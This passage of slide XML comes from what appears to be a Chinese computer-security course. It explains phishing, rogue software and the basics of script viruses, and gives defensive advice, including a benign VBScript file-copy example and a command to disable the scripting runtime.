              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用电子邮件“钓鱼”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919288" y="2565400"/>
            <a:ext cx="8362950" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64514" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用虚假网址“钓鱼”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64515" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432175" y="2060575"/>
            <a:ext cx="5021263" cy="3548063"/>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3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4000500"/>
            <a:ext cx="8763000" cy="2236788"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>这是大多数利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VB Script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>编写的病毒的一个特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277620" y="2468880"/>
            <a:ext cx="8857615" cy="953135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set fso=CreateObject("Scripting.FileSystemObject")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fso.Getfile("c:\1.txt").Copy("e:\2.txt") </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65538" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用即时消息攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65539" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774825" y="1773238"/>
            <a:ext cx="4075113" cy="3214687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65540" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4238625" y="3573463"/>
            <a:ext cx="6229350" cy="2400300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66562" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，有近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>28%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的互联网用户遭遇过虚假钓鱼网站、诈骗交易、交易劫持、网银被盗等针对网络购物的安全攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66563" name="Picture 2" descr="F:\计算机病毒防范2011-2012\PPT素材\钓鱼网站最钟爱的领域.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359150" y="2997200"/>
            <a:ext cx="5184775" cy="3290888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范网络钓鱼的安全建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68610" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融机构采取的网上安全防范措施</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在网上提供“保护客户端安全控件”，用户可以下载并安装此控件，防范卡号和密码被木马程序窃取</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>提供一种类似于“加密狗”的个人客户证书</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>派专业人员监控网络信息，一旦发现网络欺诈行为或者仿冒的网站立即向有关部门汇报；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>给每笔交易的设置最高支付限额</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">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p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范网络钓鱼的安全建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69634" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于个人用户的安全建议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>牢记自己经常使用的网上银行及其他金融机构的网址及服务电话，最好自己直接输入银行域名</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在申请网络金融服务时，应严格遵照银行的操作规程办事，建议采用银行提供的所有安全方式进行自我保护</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密码至少应该设在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>位以上，并且建议采取大小写字母、数字混合的组合方式，不要选用诸如身份证号码、出生日期、电话号码等作为密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>不要将密码等信息以文本形式保存在计算机中</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范网络钓鱼的安全建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70658" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于个人用户的安全建议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>在网上进行金融交易时，应对每一笔交易进行详细记录，在每次交易结束后再次与相关机构核对，并定期核查自己的“历史交易明细”记录</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不要在网吧等公共场合使用网上金融工具进行交易，也不要将存有交易记录的个人计算机借给他人使用</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使用杀毒软件、防火墙等网络安全产品</a:t>
            </a:r>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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71682" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件实际上是具有一定的实用价值但也具有一些电脑病毒和黑客的行为特征的软件，它是为制造者的商业利益服务的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在获取商业利益的同时，严重地损害着软件使用者的利益</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72706" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件的行为</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诱导或强行将客户端程序安装到用户的计算机上且禁止用户卸载</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利用“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>COOKIE”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>在后台秘密收集用户上网习惯、浏览顺序、所关心的话题、经常访问和搜索的网站等信息，为制作者的商业计划提供必要的信息</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73730" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件的行为</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在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>浏览器上添加广告按钮或者某些网站的栏目链接，而且禁止用户自行删除</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在未经用户允许的情况下，频繁且大量地向用户发送广告信息，强迫客户浏览强行弹出的广告，而且很多广告框没有关闭按钮，只有完全播放完毕才自行关闭</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74754" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件的分类及其流氓行径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>强制安装的恶意共享软件</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广告软件</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间谍软件及行为记录软件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>浏览器劫持</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">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流氓软件原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BHO(Browser Helper Object)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是微软推出的作为浏览器对第三方程序员开放交互接口的业界标准，通过简单的代码就可以进入浏览器领域的“交互接口”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(INTERACTIVED Interface)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。通过这个接口，程序员可以编写代码获取浏览器的行为，比如“后退”、“前进”、“当前页面”等，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的交互特性，程序员还可以用代码控制浏览器行为，比如修改替换浏览器工具栏，添加自己的程序按钮等。</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本病毒的基本原理及其防治</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10242" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1857375"/>
            <a:ext cx="8763000" cy="4379913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>如果用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>regsvr32 scrrun.dll /u</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>禁止了文件系统对象，在执行包含脚本的则提示失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5" descr="脚本运行失败提示"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2595563" y="3143250"/>
            <a:ext cx="6924675" cy="24765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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75778" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
